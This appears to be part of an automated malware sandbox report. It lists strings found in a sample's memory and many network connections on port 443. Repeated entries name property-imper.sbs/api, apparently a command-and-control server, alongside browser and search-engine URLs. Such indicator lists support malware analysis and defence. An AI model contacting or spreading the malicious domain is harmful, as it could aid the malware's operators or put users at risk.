              Source: file.exe, 00000000.00000003.2156013108.0000000005499000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2155942634.0000000005498000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
              Source: file.exe, 00000000.00000003.2156013108.0000000005499000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2155942634.0000000005498000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
              Source: file.exe, 00000000.00000003.2086859320.00000000054B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: file.exe, 00000000.00000003.2086859320.00000000054B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: file.exe, 00000000.00000003.2086859320.00000000054B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: chromecache_110.5.dr, chromecache_101.5.drString found in binary or memory: https://channel9.msdn.com/
              Source: chromecache_110.5.dr, chromecache_101.5.drString found in binary or memory: https://client-api.arkoselabs.com/v2/api.js
              Source: file.exe, 00000000.00000003.2156013108.0000000005499000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2155942634.0000000005498000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
              Source: file.exe, 00000000.00000003.2156013108.0000000005499000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2155942634.0000000005498000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
              Source: file.exe, 00000000.00000003.2086859320.00000000054B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: file.exe, 00000000.00000003.2086859320.00000000054B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: file.exe, 00000000.00000003.2086859320.00000000054B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: chromecache_118.5.drString found in binary or memory: https://github.com/Thraka
              Source: chromecache_118.5.drString found in binary or memory: https://github.com/Youssef1313
              Source: chromecache_118.5.drString found in binary or memory: https://github.com/adegeo
              Source: chromecache_118.5.drString found in binary or memory: https://github.com/dotnet/docs/blob/17c4acca45e573a92878a44a2cce57d699fe9c7c/docs/framework/install/
              Source: chromecache_118.5.drString found in binary or memory: https://github.com/dotnet/docs/blob/live/docs/framework/install/application-not-started.md
              Source: chromecache_118.5.drString found in binary or memory: https://github.com/dotnet/docs/blob/main/docs/framework/install/application-not-started.md
              Source: chromecache_118.5.drString found in binary or memory: https://github.com/dotnet/docs/issues/new?template=z-customer-feedback.yml
              Source: chromecache_110.5.dr, chromecache_101.5.drString found in binary or memory: https://github.com/dotnet/try
              Source: chromecache_118.5.drString found in binary or memory: https://github.com/gewarren
              Source: chromecache_110.5.dr, chromecache_101.5.drString found in binary or memory: https://github.com/jonschlinkert/is-plain-object
              Source: chromecache_110.5.dr, chromecache_101.5.drString found in binary or memory: https://github.com/js-cookie/js-cookie
              Source: chromecache_118.5.drString found in binary or memory: https://github.com/mairaw
              Source: chromecache_118.5.drString found in binary or memory: https://github.com/nschonni
              Source: file.exe, 00000000.00000003.2155942634.0000000005498000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
              Source: chromecache_118.5.drString found in binary or memory: https://js.monitor.azure.com/scripts/c/ms.jsll-4.min.js
              Source: chromecache_110.5.dr, chromecache_101.5.drString found in binary or memory: https://learn-video.azurefd.net/vod/player
              Source: chromecache_110.5.dr, chromecache_101.5.drString found in binary or memory: https://management.azure.com/providers/Microsoft.Portal/consoles/default?api-version=2017-12-01-prev
              Source: chromecache_110.5.dr, chromecache_101.5.drString found in binary or memory: https://management.azure.com/providers/Microsoft.Portal/userSettings/cloudconsole?api-version=2023-0
              Source: chromecache_110.5.dr, chromecache_101.5.drString found in binary or memory: https://management.azure.com/subscriptions?api-version=2016-06-01
              Source: chromecache_110.5.dr, chromecache_101.5.drString found in binary or memory: https://octokit.github.io/rest.js/#throttling
              Source: file.exe, file.exe, 00000000.00000003.2295986206.0000000000D4E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2295891028.0000000000D4B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2295891028.0000000000D3D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://property-imper.sbs/
              Source: file.exe, 00000000.00000003.2182976016.0000000000D4F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2186353361.0000000000D54000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2182683548.0000000000D4E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://property-imper.sbs/$v6/
              Source: file.exe, 00000000.00000003.2153607750.0000000000D7B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2153552340.0000000000D79000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://property-imper.sbs/55
              Source: file.exe, 00000000.00000003.2211337614.0000000000D4E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://property-imper.sbs/::
              Source: file.exe, 00000000.00000003.2125445564.0000000000D61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://property-imper.sbs/CC
              Source: file.exe, file.exe, 00000000.00000003.2186353361.0000000000D7C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2470665012.0000000000D74000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2390508545.0000000000D42000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2186523748.0000000000D66000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2230156781.0000000000D79000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2186595518.0000000000D6C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2182683548.0000000000D79000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2316669979.0000000000D66000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2390336081.0000000000D5F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2390336081.0000000000D75000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2470665012.0000000000D3D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2125480427.0000000000D4E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2153607750.0000000000D7B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2295891028.0000000000D3D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2182976016.0000000000D7C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2125445564.0000000000D61000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2182742660.0000000000D7B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2211273046.0000000000D6C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2186454577.0000000000D5C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2182976016.0000000000D4F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://property-imper.sbs/api
              Source: file.exe, 00000000.00000003.2186353361.0000000000D7C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2470665012.0000000000D74000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2230156781.0000000000D79000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2182683548.0000000000D79000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2390336081.0000000000D75000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2182976016.0000000000D7C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2182742660.0000000000D7B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2211110090.0000000000D7C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2316506779.0000000000D79000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://property-imper.sbs/api;E
              Source: file.exe, 00000000.00000003.2230156781.0000000000D6E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://property-imper.sbs/apiN
              Source: file.exe, 00000000.00000003.2153607750.0000000000D7B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2153552340.0000000000D79000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://property-imper.sbs/apiy
              Source: file.exe, 00000000.00000003.2295891028.0000000000D3D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://property-imper.sbs/h
              Source: file.exe, 00000000.00000003.2390528382.0000000000CD1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://property-imper.sbs:443/api
              Source: file.exe, 00000000.00000003.2390528382.0000000000CD1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://property-imper.sbs:443/apiK
              Source: file.exe, 00000000.00000003.2390528382.0000000000CD1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://property-imper.sbs:443/apiicrosoft
              Source: chromecache_101.5.drString found in binary or memory: https://schema.org
              Source: file.exe, 00000000.00000003.2155584528.00000000055A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
              Source: file.exe, 00000000.00000003.2155584528.00000000055A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
              Source: chromecache_110.5.dr, chromecache_101.5.drString found in binary or memory: https://twitter.com/intent/tweet?original_referer=$
              Source: chromecache_110.5.dr, chromecache_101.5.drString found in binary or memory: https://videoencodingpublic-hgeaeyeba8gycee3.b01.azurefd.net/public-09ce73a6-05a5-4e4d-b3d7-bd5a8c05
              Source: chromecache_101.5.drString found in binary or memory: https://videoencodingpublic-hgeaeyeba8gycee3.b01.azurefd.net/public-b4da8140-92cf-421c-8b7b-e471d5b9
              Source: file.exe, 00000000.00000003.2156013108.0000000005499000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2155942634.0000000005498000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
              Source: file.exe, 00000000.00000003.2156013108.0000000005499000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2155942634.0000000005498000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
              Source: file.exe, 00000000.00000003.2086859320.00000000054B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
              Source: file.exe, 00000000.00000003.2086859320.00000000054B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: chromecache_110.5.dr, chromecache_101.5.drString found in binary or memory: https://www.linkedin.com/cws/share?url=$
              Source: file.exe, 00000000.00000003.2155584528.00000000055A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
              Source: file.exe, 00000000.00000003.2155584528.00000000055A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
              Source: file.exe, 00000000.00000003.2155584528.00000000055A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
              Source: file.exe, 00000000.00000003.2155584528.00000000055A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
              Source: file.exe, 00000000.00000003.2155584528.00000000055A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
              Source: file.exe, 00000000.00000003.2155584528.00000000055A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49986
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49864
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49985
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49863
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49984
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49862
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49983
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49861
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49982
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49860
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49981
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49980
              Source: unknownNetwork traffic detected: HTTP traffic on port 49932 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49898 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49875 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49990 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49979
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49978
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49977
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49976
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49854
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49975
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49974
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49973
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49972
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49971
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49970
              Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49967 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50004 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49909 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
              Source: unknownNetwork traffic detected: HTTP traffic on port 49943 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
              Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49848
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49969
              Source: unknownNetwork traffic detected: HTTP traffic on port 49978 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49847
              Source: unknownNetwork traffic detected: HTTP traffic on port 49886 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49968
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49846
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49967
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49845
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49966
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49844
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49965
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49964
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49963
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49962
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49961
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49960
              Source: unknownNetwork traffic detected: HTTP traffic on port 49966 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49989 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49933 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49959
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49958
              Source: unknownNetwork traffic detected: HTTP traffic on port 49921 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49957
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49956
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49955
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
              Source: unknownNetwork traffic detected: HTTP traffic on port 49887 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49954
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49953
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49951
              Source: unknownNetwork traffic detected: HTTP traffic on port 49864 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49950
              Source: unknownNetwork traffic detected: HTTP traffic on port 49944 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49910 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
              Source: unknownNetwork traffic detected: HTTP traffic on port 49955 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49949
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49948
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49947
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49946
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49945
              Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49944
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49943
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
              Source: unknownNetwork traffic detected: HTTP traffic on port 49922 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
              Source: unknownNetwork traffic detected: HTTP traffic on port 49945 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
              Source: unknownNetwork traffic detected: HTTP traffic on port 49968 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49980 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49885 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49899
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49898
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49897
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49896
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49895
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
              Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49894
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49893
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49892
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49891
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49890
              Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49897 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49911 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49957 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49991 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49889
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49888
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49887
              Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49886
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49885
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
              Source: unknownNetwork traffic detected: HTTP traffic on port 49863 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49884
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49883
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49882
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49881
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49880
              Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49956 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50005 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49979 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49879
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49878
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49999
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49877
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49998
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49997
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49875
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49996
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49874
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49995
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49873
              Source: unknownNetwork traffic detected: HTTP traffic on port 49923 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49994
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49872
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49993
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49871
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49992
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49870
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49991
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49990
              Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49934 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49869
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49868
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49989
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49988
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49987
              Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49906 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49900 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49975 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49929 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49964 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
